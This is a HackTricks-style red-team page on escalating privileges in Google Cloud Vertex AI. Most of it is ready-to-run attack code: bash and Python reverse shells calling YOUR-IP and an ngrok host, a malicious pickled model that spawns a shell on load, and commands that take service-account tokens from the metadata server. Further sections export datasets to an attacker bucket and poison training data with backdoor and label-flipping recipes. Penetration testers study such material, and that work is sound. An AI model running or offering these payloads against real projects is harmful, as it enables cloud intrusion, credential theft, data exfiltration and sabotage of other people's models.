# GCP - Vertex AI Privesc

> [!TIP]
> Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)\
> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)\
> Learn & practice Az Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** đŠ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>
## Vertex AI

For more information about Vertex AI, check:

For Agent Engine / Reasoning Engine post-exploitation paths using the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting across consumer / producer / tenant resources, check:
GCP - Vertex AI Post Exploitation
### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`

With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can run arbitrary code with elevated privileges.

This works by creating a custom training job that runs attacker-controlled code (either a custom container or a Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, which allows extracting the service account's OAuth access token.

**Impact**: Full privilege escalation to the target service account's permissions.
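What the in-job payloads in this section ultimately do can be sketched in Python: query the metadata server from inside the job and parse the JSON it returns. A minimal sketch — the URL and `Metadata-Flavor` header are the real metadata-service values, but `fetch_token` is never called here and the sample response below is fabricated for illustration:

```python
import json
import urllib.request

METADATA_URL = ("http://metadata.google.internal/computeMetadata/v1/"
                "instance/service-accounts/default/token")

def fetch_token() -> dict:
    """Run inside the job: ask the metadata server for the SA's OAuth token."""
    req = urllib.request.Request(METADATA_URL, headers={"Metadata-Flavor": "Google"})
    with urllib.request.urlopen(req) as resp:
        return parse_token(resp.read().decode())

def parse_token(body: str) -> dict:
    """The metadata server answers with JSON: access_token, expires_in, token_type."""
    data = json.loads(body)
    return {"token": data["access_token"], "ttl_seconds": data["expires_in"]}

# Fabricated sample of the response shape, for illustration only:
sample = '{"access_token": "ya29.EXAMPLE", "expires_in": 3599, "token_type": "Bearer"}'
print(parse_token(sample))
```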
<details>

<summary>Create custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
    --region=<region> \
    --display-name=revshell-job \
    --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
    --command=sh \
    --args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
    --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
    --region=<region> \
    --display-name=revshell-job \
    --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
    --command=sh \
    --args=-c,'python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])"' \
    --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```
</details>
<details>

<summary>Alternative: extract token from logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
```

</details>

### `aiplatform.models.upload`, `aiplatform.models.get`
This technique achieves privilege escalation by uploading a model to Vertex AI and then using that model to run code with elevated privileges via an endpoint deployment or a batch prediction job.

> [!NOTE]
> To perform this attack you need a publicly readable GCS bucket, or to create a new one, to upload the model artifacts to.
<details>

<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (["/bin/bash", "-c", cmd],))

# Save malicious model
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
    --region=<region> \
    --artifact-uri=gs://your-bucket/malicious-model/ \
    --display-name=malicious-sklearn \
    --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```
</details>
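The reason the pickled model executes code is `__reduce__`: during deserialization, `pickle.loads` calls whatever callable that method returns, with the arguments it supplies. A harmless local demonstration of the same gadget, using `eval` on a constant instead of `subprocess.Popen`:

```python
import pickle

class EvilOnLoad:
    # __reduce__ tells pickle how to "reconstruct" the object:
    # here, by calling eval("6*7") - any importable callable works,
    # which is exactly how the model above spawns subprocess.Popen
    def __reduce__(self):
        return (eval, ("6*7",))

payload = pickle.dumps(EvilOnLoad())
result = pickle.loads(payload)   # the attacker-chosen call runs during load
print(result)                    # 42 - proof the callable executed
```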
<details>
<summary>Upload model with reverse shell in the container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c 'import pickle; pickle.dump({}, open("model.pkl", "wb"))'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>

> [!DANGER]
> After uploading the malicious model, an attacker could wait for someone to use the model, or trigger it themselves via an endpoint deployment or a batch prediction job.

### `iam.serviceAccounts.actAs`, (`aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`) or (`aiplatform.endpoints.setIamPolicy`)

If you have permissions to create and deploy models to endpoints, or to modify endpoint IAM policies, you can leverage malicious models already uploaded to the project to escalate privileges. To trigger one of the previously uploaded malicious models via an endpoint, all you need to do is:
<details>

<summary>Deploy malicious model to an endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
    --region=<region> \
    --display-name=privesc-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
    --region=<region> \
    --model=<model-id> \
    --display-name=revshell-deployment \
    --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
    --machine-type=n1-standard-2 \
    --min-replica-count=1
```
</details>
### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
If you have permissions to create **batch prediction jobs** and run them with a service account, you can access the metadata service. The malicious code runs from a **custom prediction container** or a **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created via the REST API or the Python SDK (no gcloud CLI support).
> [!NOTE]
> This attack first requires uploading a malicious model (see the `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
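If you prefer scripting the call over raw curl, the job body can be built and inspected in Python first. A sketch using the same placeholder names as the rest of this page (the actual POST is left commented out):

```python
import json

PROJECT = "your-project"
REGION = "us-central1"
MODEL_ID = "<model-id-from-step-1>"
TARGET_SA = "target-sa@your-project.iam.gserviceaccount.com"

def build_batch_job_body():
    """Batch prediction job body: the malicious model plus the
    privileged service account to run it as."""
    return {
        "displayName": "batch-exfil-job",
        "model": f"projects/{PROJECT}/locations/{REGION}/models/{MODEL_ID}",
        "inputConfig": {
            "instancesFormat": "jsonl",
            "gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]},
        },
        "outputConfig": {
            "predictionsFormat": "jsonl",
            "gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"},
        },
        "dedicatedResources": {
            "machineSpec": {"machineType": "n1-standard-2"},
            "startingReplicaCount": 1,
            "maxReplicaCount": 1,
        },
        "serviceAccount": TARGET_SA,
    }

body = build_batch_job_body()
url = (f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT}"
       f"/locations/{REGION}/batchPredictionJobs")
print(json.dumps(body, indent=2))
# POST with: requests.post(url, json=body, headers={"Authorization": f"Bearer {token}"})
```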
<details>
<summary>Create a batch prediction job with a malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>

### `aiplatform.models.export`
If you have the `aiplatform.models.export` permission, you can export model artifacts to a GCS bucket you control, potentially gaining access to sensitive training data or model files.

> [!NOTE]
> To perform this attack you need a world-readable and writable GCS bucket, or to create a new one, to upload the model artifacts to.
<details>

<summary>Export model artifacts to a GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
  -d '{
    "outputConfig": {
      "exportFormatId": "custom-trained",
      "artifactDestination": {
        "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
      }
    }
  }'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Create **ML pipeline jobs** that run multiple steps with arbitrary containers and achieve privilege escalation through a reverse shell.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.

> [!NOTE]
> You need a GCS bucket writable by anyone to use as the pipeline root.
<details>
<summary>Install the Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

</details>

<details>

<summary>Create pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "<region>"
TARGET_SA = "<target-sa>@<project-id>.iam.gserviceaccount.com"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"4.tcp.eu.ngrok.io\",17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("[+] Pipeline job submitted successfully!")
    print(f"    Job name: {result.get('name', 'N/A')}")
    print("    Check your reverse shell listener for connection")
else:
    print(f"[-] Error: {response.status_code}")
    print(f"    {response.text}")
```
</details>
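Before submitting, it can be worth sanity-checking that a hand-written pipeline spec wires tasks, components, and executors together, since a rejected spec burns an attempt and makes noise in logs. A minimal structural check — these rules are my own heuristic, not an official schema validator:

```python
def validate_pipeline_spec(spec: dict) -> list:
    """Minimal structural checks for a KFP v2-style pipelineSpec:
    every task's componentRef must name a component, and every
    component's executorLabel must map to an executor with an image."""
    errors = []
    components = spec.get("components", {})
    executors = spec.get("deploymentSpec", {}).get("executors", {})
    tasks = spec.get("root", {}).get("dag", {}).get("tasks", {})
    for task_name, task in tasks.items():
        ref = task.get("componentRef", {}).get("name")
        if ref not in components:
            errors.append(f"task {task_name}: unknown component {ref}")
            continue
        label = components[ref].get("executorLabel")
        container = executors.get(label, {}).get("container", {})
        if not container.get("image"):
            errors.append(f"component {ref}: executor {label} has no container image")
    return errors

# Toy spec mirroring the structure used above
spec = {
    "schemaVersion": "2.1.0",
    "root": {"dag": {"tasks": {"t": {"componentRef": {"name": "comp"}}}}},
    "components": {"comp": {"executorLabel": "exec"}},
    "deploymentSpec": {"executors": {"exec": {"container": {"image": "python:3.11-slim"}}}},
}
print(validate_pipeline_spec(spec))  # [] - everything wires up
```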
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Create **hyperparameter tuning jobs** that run arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or an exfiltration command, and attaching a privileged service account to it, you can achieve privilege escalation.

**Impact**: Full privilege escalation to the target service account's permissions.
<details>
<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

</details>

### `aiplatform.datasets.export`
Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data, which may include PII, confidential business data, or other sensitive information used to train production models.
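Once exported, the JSONL can be triaged automatically for sensitive strings. A small sketch — the regex patterns are illustrative rather than exhaustive, and the sample line is fabricated:

```python
import json
import re

# Illustrative patterns only; extend for real engagements
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "api_key": re.compile(r"AIza[0-9A-Za-z_-]{35}"),  # Google API key shape
}

def scan_jsonl(text: str) -> list:
    """Scan exported dataset JSONL lines for sensitive-looking strings."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON lines
        blob = json.dumps(record)
        for kind, pat in PATTERNS.items():
            for match in pat.findall(blob):
                hits.append((lineno, kind, match))
    return hits

# Fabricated sample record for illustration
sample = '{"textContent":"contact admin@corp.example for key AIzaSyA1234567890abcdefghijklmnopqrstuvw"}'
print(scan_jsonl(sample))
```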
<details>

<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
  -d '{
    "exportConfig": {
      "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
    }
  }'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
```
The exported data may contain:
- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data
</details>
### `aiplatform.datasets.import`
Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

By importing manipulated data into a dataset used to train ML models, an attacker can:

- Introduce backdoors into the models (trigger-based misclassification)
- Poison the training data to degrade model performance
- Inject data to make models leak information
- Manipulate model behavior for specific inputs

This attack is particularly effective against datasets used for:

- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)
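The poisoning payloads below can also be generated programmatically. A sketch of the label-flipping case, emitting JSONL lines in the same single-label image classification schema used in this section (the bucket paths are hypothetical):

```python
import json

def label_flip(sample_uris, target_label):
    """Relabel legitimate GCS samples with an attacker-chosen class,
    producing JSONL lines in the image-classification import format."""
    lines = []
    for uri in sample_uris:
        lines.append(json.dumps({
            "imageGcsUri": uri,
            "classificationAnnotation": {"displayName": target_label},
        }))
    return "\n".join(lines)

# Hypothetical bucket paths - replace with real dataset samples
samples = [f"gs://legitimate-data/sample_{i}.jpg" for i in range(1, 4)]
jsonl = label_flip(samples, "malicious")
print(jsonl)
```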
<details>
<summary>Import poisoned data into the dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
```

</details>

**Attack scenarios:**

<details>

<summary>Backdoor attack - image classification</summary>

```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```

</details>

<details>

<summary>Label flipping attack</summary>

```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```

</details>

<details>

<summary>Data poisoning for model extraction</summary>

```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```

</details>

<details>

<summary>Targeted attack on specific entities</summary>

```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```

</details>

> [!DANGER]
> Data poisoning attacks can have severe consequences:
>
> - Security systems: bypassing facial recognition or anomaly detection
> - Fraud detection: training models to ignore specific fraud patterns
> - Content moderation: getting harmful content classified as safe
> - Medical AI: misclassifying critical health conditions
> - Autonomous systems: manipulating object detection for safety-critical decisions

**Impact**:

- Backdoored models that misclassify based on specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models trained on poisoned data inherit the backdoor)
### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`

> [!WARNING]
> **Deprecated API**: the `aiplatform.notebookExecutionJobs.create` API is deprecated as part of the retirement of Vertex AI Workbench Managed Notebooks. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). The Workbench Executor schedules notebook executions on Vertex AI's custom training infrastructure with a specified service account and is essentially a convenience wrapper around `customJobs.create`. For privilege escalation via notebooks, use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor. The following technique is provided for historical context only and is not recommended for new assessments.

Create notebook execution jobs that run Jupyter notebooks with arbitrary code.

Notebook jobs are ideal for interactive-style code execution with a service account, as they support Python code cells and shell commands.

<details>

<summary>Create malicious notebook file</summary>

```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```
</details>

<details>

<summary>Run the notebook with the target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs" \
  -d '{
    "displayName": "data-analysis-job",
    "gcsNotebookSource": {
      "uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
    },
    "gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
    "serviceAccount": "'${TARGET_SA}'",
    "executionTimeout": "3600s"
  }'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```
</details>
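Instead of hand-writing the notebook JSON, it can be generated. A minimal sketch of an nbformat-4 notebook with a single token-stealing code cell (same metadata URL as above; the output filename is arbitrary):

```python
import json

def build_notebook(source_lines):
    """Minimal nbformat-4 notebook with one code cell; the execution job
    runs the cell with the permissions of the attached service account."""
    return {
        "cells": [{
            "cell_type": "code",
            "metadata": {},
            "execution_count": None,
            "outputs": [],
            "source": source_lines,
        }],
        "metadata": {},
        "nbformat": 4,
        "nbformat_minor": 5,
    }

nb = build_notebook([
    "import urllib.request\n",
    "url = 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'\n",
    "req = urllib.request.Request(url, headers={'Metadata-Flavor': 'Google'})\n",
    "print(urllib.request.urlopen(req).read().decode())\n",
])
with open("malicious.ipynb", "w") as f:
    json.dump(nb, f)
```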
## References
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)